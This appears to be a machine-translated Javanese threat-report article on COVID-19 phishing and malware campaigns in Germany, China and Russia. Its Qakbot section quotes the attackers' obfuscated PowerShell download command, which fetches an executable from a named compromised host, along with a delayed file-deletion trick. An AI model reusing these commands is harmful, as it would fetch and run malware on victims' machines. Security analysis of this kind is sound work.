Penyerang terus ngeksploitasi topik COVID-19, nggawe ancaman liyane kanggo pangguna sing kepengin banget karo kabeh sing ana gandhengane karo wabah kasebut. ING Kita wis ngomong babagan jinis malware apa wae sing muncul sawise coronavirus, lan dina iki kita bakal ngomong babagan teknik teknik sosial sing wis ditemoni pangguna ing macem-macem negara, kalebu Rusia. Tren lan conto umum ana ing ngisor iki.
Eling ing Kita ngomong babagan kasunyatan manawa wong gelem maca ora mung babagan koronavirus lan kedadeyane wabah kasebut, nanging uga babagan langkah dhukungan finansial? Iki conto sing apik. Serangan phishing sing menarik ditemokake ing negara bagian Rhine-Westphalia Utara utawa NRW ing Jerman. Para penyerang nggawe salinan situs web Kementerian Ekonomi (), ing ngendi sapa wae bisa njaluk bantuan finansial. Program kasebut pancen ana, lan ternyata migunani kanggo scammers. Sawise nampa data pribadhi para korban, dheweke nggawe aplikasi ing situs web pelayanan nyata, nanging nuduhake rincian bank liyane. Miturut data resmi, 4 ewu panjaluk palsu kasebut digawe nganti skema kasebut ditemokake. AkibatΓ©, $ 109 yuta kanggo warga sing kena pengaruh tiba ing tangan penipu.
Apa sampeyan pengin tes gratis kanggo COVID-19?
Conto penting liyane babagan phishing bertema coronavirus yaiku ing email. Pesen kasebut narik kawigaten para pangguna kanthi tawaran kanggo nyoba tes gratis kanggo infeksi koronavirus. Ing lampiran kasebut ana kedadean saka Trickbot / Qakbot / Qbot. Lan nalika wong-wong sing pengin mriksa kesehatane wiwit "ngisi formulir sing dilampirake", skrip jahat diundhuh menyang komputer. Lan kanggo ngindhari tes sandboxing, skrip wiwit ndownload virus utama mung sawise sawetara wektu, nalika sistem proteksi yakin yen ora ana kegiatan ala.
Ngyakinake umume pangguna kanggo ngaktifake makro uga gampang. Kanggo nindakake iki, trik standar digunakake: kanggo ngisi kuesioner, sampeyan kudu ngaktifake makro, tegese sampeyan kudu mbukak skrip VBA.
Nalika sampeyan bisa ndeleng, script VBA khusus masked saka antivirus.
Windows nduweni fitur ngenteni ing ngendi aplikasi ngenteni / T <detik> sadurunge nampa jawaban "Ya" standar. Ing kasus kita, skrip ngenteni 65 detik sadurunge mbusak file sementara:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
Lan nalika ngenteni, malware diundhuh. Skrip PowerShell khusus diluncurake kanggo iki:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Sawise dekoding nilai Base64, skrip PowerShell ndownload backdoor sing ana ing server web sing sadurunge disusupi saka Jerman:
http://automatischer-staubsauger.com/feature/777777.pnglan disimpen kanthi jeneng:
C:UsersPublictmpdirfile1.exe
Folder βC:UsersPublictmpdirβ dibusak nalika mbukak file 'tmps1.bat' sing ngemot printah cmd /c mkdir ""C:UsersPublictmpdir"".
Serangan sing ditargetake marang lembaga pemerintah
Kajaba iku, analis FireEye bubar nglaporake serangan APT32 sing ditargetake kanggo struktur pemerintah ing Wuhan, uga Menteri Manajemen Darurat China. Salah sawijining RTF sing disebarake ngemot link menyang artikel New York Times kanthi irah-irahan . Nanging, nalika maca, malware diundhuh (analis FireEye ngenali conto kasebut minangka METALJACK).
Apike, nalika deteksi, ora ana antivirus sing ndeteksi kedadeyan kasebut, miturut Virustotal.
Nalika situs web resmi mudhun
Conto serangan phishing sing paling nggumunake kedadeyan ing Rusia sawetara dina. Alesan kanggo iki yaiku janjian keuntungan sing ditunggu-tunggu kanggo bocah umur 3 nganti 16 taun. Nalika wiwitan nrima aplikasi diumumake tanggal 12 Mei 2020, mayuta-yuta wong cepet-cepet menyang situs web Layanan Negara kanggo bantuan sing wis suwe ditunggu-tunggu lan nggawa portal kasebut ora luwih ala tinimbang serangan DDoS profesional. Nalika presiden ujar manawa "Layanan Pemerintah ora bisa ngatasi aliran aplikasi," wong-wong wiwit ngomong online babagan peluncuran situs alternatif kanggo nrima aplikasi.
Masalahe yaiku sawetara situs wiwit bisa digunakake bebarengan, lan nalika siji, sing nyata ing posobie16.gosuslugi.ru, bener nampa aplikasi, luwih .
Kolega saka SearchInform nemokake babagan 30 domain penipuan anyar ing zona .ru. Perusahaan Infosecurity lan Softline wis nglacak luwih saka 70 situs web layanan pemerintah palsu sing padha wiwit awal April. Pencipta dheweke ngapusi simbol sing akrab lan uga nggunakake kombinasi tembung gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie, lan liya-liyane.
Hype lan rekayasa sosial
Kabeh conto kasebut mung ngonfirmasi manawa panyerang kasil monetisasi topik koronavirus. Lan luwih dhuwur ketegangan sosial lan masalah sing ora jelas, luwih akeh kemungkinan scammers nyolong data penting, meksa wong nyerah dhuwit dhewe, utawa mung hack komputer liyane.
Lan amarga pandhemen kasebut meksa wong sing ora siyap kerja ing omah kanthi massal, ora mung pribadi, nanging uga data perusahaan ana risiko. Contone, bubar pangguna Microsoft 365 (biyen Office 365) uga kena serangan phishing. Wong nampa pesen swara "ora kejawab" minangka lampiran kanggo surat. Nanging, file kasebut sejatine minangka kaca HTML sing ngirim korban serangan kasebut . AkibatΓ©, mundhut akses lan kompromi kabeh data saka akun.
Source: www.habr.com